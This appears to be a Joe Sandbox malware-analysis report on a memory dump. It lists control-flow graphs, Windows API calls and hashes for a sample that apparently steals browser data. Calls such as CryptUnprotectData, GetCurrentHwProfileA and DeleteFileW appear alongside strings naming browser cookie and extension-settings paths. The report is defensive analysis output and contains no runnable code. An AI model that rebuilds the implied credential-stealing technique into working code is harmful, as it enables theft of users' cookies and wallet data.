    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CallbackDispatcherMetricsSystemUser
    • String ID:
    • API String ID: 365337688-0
    • Opcode ID: acc6e3f917002cb393e7bebcc8fa76269b1114e8605c2d05314830a60851bc33
    • Instruction ID: 353d141b17f8b9f6255c5ada491d7eff40bd7bd981b66796a2882a1aaa30915b
    • Opcode Fuzzy Hash: acc6e3f917002cb393e7bebcc8fa76269b1114e8605c2d05314830a60851bc33
    • Instruction Fuzzy Hash: 72D0C934144308EFD700DF91D809B94BBA8FF48751F54C176FD8D4A781DAB255858BE2

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 248 191110-191127 249 19112d-191187 call 192170 call 192250 call 1990f0 248->249 250 1912e5-1912e8 248->250 257 191189-1911ab call 1936d0 249->257 258 1911b0-1911b4 249->258 262 1912d9-1912e2 call 191ee0 257->262 259 1911bf-1911c9 258->259 259->262 263 1911cf-1911e1 259->263 262->250 264 1911e3 263->264 265 1911e5-1911fa 263->265 264->259 268 191238-19123c 265->268 269 1911fc-191200 265->269 271 19123e-191252 268->271 272 191254-191268 268->272 269->268 273 191202-191209 call 1990b0 269->273 271->272 274 191280-1912ba call 1936d0 271->274 275 19126a-19127e 272->275 276 1912d4 272->276 279 19120e-191218 273->279 282 1912bc-1912c6 274->282 283 1912d2 274->283 275->274 275->276 276->262 279->268 281 19121a-191235 call 192250 call 1990f0 279->281 281->268 282->283 285 1912c8-1912cc DeleteFileW 282->285 283->262 285->283
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: DeleteFile
    • String ID:
    • API String ID: 4033686569-0
    • Opcode ID: 8ddea9995c81336d6a2b874a67162a43d234dd7530704bf9b3e8413c78ab841a
    • Instruction ID: f27c209b3b3ca0f2ab6ab9e72b3773a23395c1752621952007e6394637d71934
    • Opcode Fuzzy Hash: 8ddea9995c81336d6a2b874a67162a43d234dd7530704bf9b3e8413c78ab841a
    • Instruction Fuzzy Hash: 7251B674D08159BBCF04DFA4C890BEEBBB6AF95314F1881A8E8559B342C335EB91CB51

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 289 191060-191083 290 191085-19109e SHGetFolderPathW 289->290 291 1910a4-1910c3 call 198d40 289->291 290->291 293 1910c8-1910cf 291->293 294 1910fd-191100 293->294 295 1910d1-1910f6 call 191ec0 call 192b10 293->295 295->294
    APIs
    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 0019109E
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FolderPath
    • String ID:
    • API String ID: 1514166925-0
    • Opcode ID: 1895b19786a9fb08cd6d77f4459d1eb3450abbd1ff4669e3148856eb82923426
    • Instruction ID: 6fee465d0f52d78735461c75e0789ef6abba060622802256b1a1157168b76c96
    • Opcode Fuzzy Hash: 1895b19786a9fb08cd6d77f4459d1eb3450abbd1ff4669e3148856eb82923426
    • Instruction Fuzzy Hash: F81142B5A04208BBDB00DF98C855FEE7775EF44314F14C168FA289B2C2D7769A41CB90

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 300 1912f0-191305 301 191327-191353 call 198d40 300->301 302 191307-191321 SHGetFolderPathW 300->302 305 191370-191373 301->305 306 191355-191361 call 193a20 301->306 302->301 308 191366-191369 306->308 308->305
    APIs
    • SHGetFolderPathW.SHELL32(00000000,10428910,00000000,00000000,00192520), ref: 00191321
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FolderPath
    • String ID:
    • API String ID: 1514166925-0
    • Opcode ID: 720b6e9f2aadbcc30fd74682df808e317a8d51cf591768fc0630d0a4816bef73
    • Instruction ID: 62642c4141502e180fa5a752c5c79ed7638a72c610dbe5cec65941b6ff13506f
    • Opcode Fuzzy Hash: 720b6e9f2aadbcc30fd74682df808e317a8d51cf591768fc0630d0a4816bef73
    • Instruction Fuzzy Hash: 95015EB0600208BBDB04CF48CC55FEA7378EB44314F1482A8FA194B2C2D775AB84CB94

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 309 198b90-198ba8 GetCurrentHwProfileA 310 198bfa-198bfd 309->310 311 198baa-198bb1 309->311 312 198bd3-198bdd 311->312 313 198bb3-198bd1 call 191f10 311->313 312->310 315 198bdf-198bf7 call 191f10 312->315 313->310 315->310
    APIs
    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00198BA0
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CurrentProfile
    • String ID:
    • API String ID: 2104809126-0
    • Opcode ID: 1c15b96e27df9424ba9b1e2e2f44ab5cd215c35183500fd084a808e51944decc
    • Instruction ID: 823dfbf6428028509bdc459738a6c812f428a0e78310050f453e7921cb9c14c4
    • Opcode Fuzzy Hash: 1c15b96e27df9424ba9b1e2e2f44ab5cd215c35183500fd084a808e51944decc
    • Instruction Fuzzy Hash: 90F0FFB090410CABCF04DB64D891BBE3B79EB41304F18C1A9F90656285EB31DB448B51
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: da79f7f49f10b24e42cee1365696f61a6de605d49261fddc7ac32c7ba1ef4680
    • Instruction ID: f73625c4d9bdde4a23211141e431d5b5b91a4abb60062fee6f9f401817a66bf2
    • Opcode Fuzzy Hash: da79f7f49f10b24e42cee1365696f61a6de605d49261fddc7ac32c7ba1ef4680
    • Instruction Fuzzy Hash: CDE0DFB6A04208FFDF009FA0E888BAB33A8AB44720F08C414F90E8B110C331D980CB91
    APIs
    • ExitProcess.KERNEL32 ref: 00191CD0
      • Part of subcall function 00191E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00191CB1,?,00191D86,?), ref: 00191E59
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CreateExitHeapProcess
    • String ID:
    • API String ID: 611137554-0
    • Opcode ID: f2745f8180ff4c3e8a2caa45e87a729228c3425341716613d1e5377fbe4fcccd
    • Instruction ID: ab53a9b36e1be4b3bb15079d64f794a8fdb5c3260b06117be71adeefc5762bf5
    • Opcode Fuzzy Hash: f2745f8180ff4c3e8a2caa45e87a729228c3425341716613d1e5377fbe4fcccd
    • Instruction Fuzzy Hash: 15D06765B8570776EE6037B25E0676A36CC5F22784F880821BE08C5696FB65ED9082A2
    APIs
    • RtlFreeHeap.NTDLL(02590000,00000000,00000000,009C0000), ref: 00191EFE
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 96807a4a7003ef08c04f1c74191c82191d844e8b991f2520271e7c67c1bab140
    • Instruction ID: 81387e2ecb43f9d187735a63daf8c0aa69fd7456bed5b1d32184c01f68e4169f
    • Opcode Fuzzy Hash: 96807a4a7003ef08c04f1c74191c82191d844e8b991f2520271e7c67c1bab140
    • Instruction Fuzzy Hash: B2E0177050920CFBDB14CF98EA88BAE7BF8EB08705F104199F90887790D771AE80CB91
    APIs
    • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00191CB1,?,00191D86,?), ref: 00191E59
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: fea00a7663e4d7b498f234a5014004a818db611b8c7240c319fa5fdcf8ae5e83
    • Instruction ID: c65f560b6f5dee84a4ac538ea6ddecf2a3f09f41b67b216d37fd85543fca74c5
    • Opcode Fuzzy Hash: fea00a7663e4d7b498f234a5014004a818db611b8c7240c319fa5fdcf8ae5e83
    • Instruction Fuzzy Hash: 09D01230668309FBF7205760BD89B153694A304B55F100432FD0A895F0E3B164C04614
    APIs
    • RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: f4905e0ff291d6595c1ae9d04c43c2798dafa3bd2a95f8235b5af776cb240d87
    • Instruction ID: da345d6efd461fe1627a04968e25969d5a36c8c2d3841ed10ee773e776b4f34c
    • Opcode Fuzzy Hash: f4905e0ff291d6595c1ae9d04c43c2798dafa3bd2a95f8235b5af776cb240d87
    • Instruction Fuzzy Hash: B9C04C75164208ABD6049B94FE99E6A3BACA748A00F444519B6094A550DB61A8408750
    APIs
    • Sleep.KERNELBASE(000003E8), ref: 00192E41
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: 8235c94547f327b29930af424654b69cffd98ef84b1a1409b74bfc6391310cd8
    • Instruction ID: f0b27125cc05f05b784c288e552ad1a2a73cb2f124fb4f03a109f75100263ced
    • Opcode Fuzzy Hash: 8235c94547f327b29930af424654b69cffd98ef84b1a1409b74bfc6391310cd8
    • Instruction Fuzzy Hash: CA113678A00208F7CB18CF88D490AB9B7B5FF58305F608198F9068B381E735DE91E7A0
    APIs
    • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00192AF6
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: a55bc0ca7da8e524c00091b054f3d898e6a02602733bdbf1d26a7a122f96e6ea
    • Instruction ID: 9a78a9f3b85993ea02f9118f38284c4e2b25b94170aa3588c14721dabf036fee
    • Opcode Fuzzy Hash: a55bc0ca7da8e524c00091b054f3d898e6a02602733bdbf1d26a7a122f96e6ea
    • Instruction Fuzzy Hash: 3C119E29900219F6CF24DF95D441BBC77B2BF14700F6040A9F9062BAC1E7B95F80E391
    APIs
    • NtQueryObject.NTDLL(00191593,00000001,?,00000000,00000000), ref: 0019166E
    • NtQueryObject.NTDLL(00191593,00000001,?,00000000,00000000), ref: 00191689
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: ObjectQuery
    • String ID: \Local Extensions Settings\$\Network\Cookies$p+v
    • API String ID: 2748340528-202866110
    • Opcode ID: 50c592662f3036eb374851aa07ebb2fa2805ede2717617f7b4ad5a651320eed7
    • Instruction ID: 1a08084465bac05f3331b88fac072363742a66977fbe82e770a061584c280d2b
    • Opcode Fuzzy Hash: 50c592662f3036eb374851aa07ebb2fa2805ede2717617f7b4ad5a651320eed7
    • Instruction Fuzzy Hash: D1216379E00208BBDF10CB90DD41FD97779AB58705F548099F948D7281EBB1EAD8CB91
    APIs
    • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C53
    • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C63
    • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
    • String ID: `Iu
    • API String ID: 3068283267-3215586153
    • Opcode ID: 775aad5bbc8eca80822b0fc36427796b78e3d2fdf87cb1561f065e1774464a13
    • Instruction ID: 351ecb0cf9b73c5d30084531fc82c9a53ad0f58a1d5480fcadb98642abd4e052
    • Opcode Fuzzy Hash: 775aad5bbc8eca80822b0fc36427796b78e3d2fdf87cb1561f065e1774464a13
    • Instruction Fuzzy Hash: 8FC04C312D830566EA502BF46D0BB1936586B14B07F984015F30E984D19ED1545485A7
    APIs
    • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00191033
      • Part of subcall function 001932A0: LocalFree.KERNEL32(?), ref: 001933BA
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CryptDataFreeLocalUnprotect
    • String ID:
    • API String ID: 1561624719-0
    • Opcode ID: cc56e62f8c78ec25d386d516eb41bffacf2178dfc6c36e8edc4255b9efcd7a7d
    • Instruction ID: d8bdf9aaaa2421de512c6d2e03aa591f4b7f0b06f77d3573cf14e61244caa063
    • Opcode Fuzzy Hash: cc56e62f8c78ec25d386d516eb41bffacf2178dfc6c36e8edc4255b9efcd7a7d
    • Instruction Fuzzy Hash: 73F01C7690010CAFDB04DFA8D885EFE77BCEB44310F08856AF9198B281EB31D694CB90
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
    • Instruction ID: 1787d30de3904c41c03c513e381a269e709bddba6d36213cde7ad63265d9666a
    • Opcode Fuzzy Hash: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
    • Instruction Fuzzy Hash: 26312CB1D00209EFDF14CF98D841BAEBBB4EF15314F24C46DEA4AE7241D734AA809B95
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
    • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595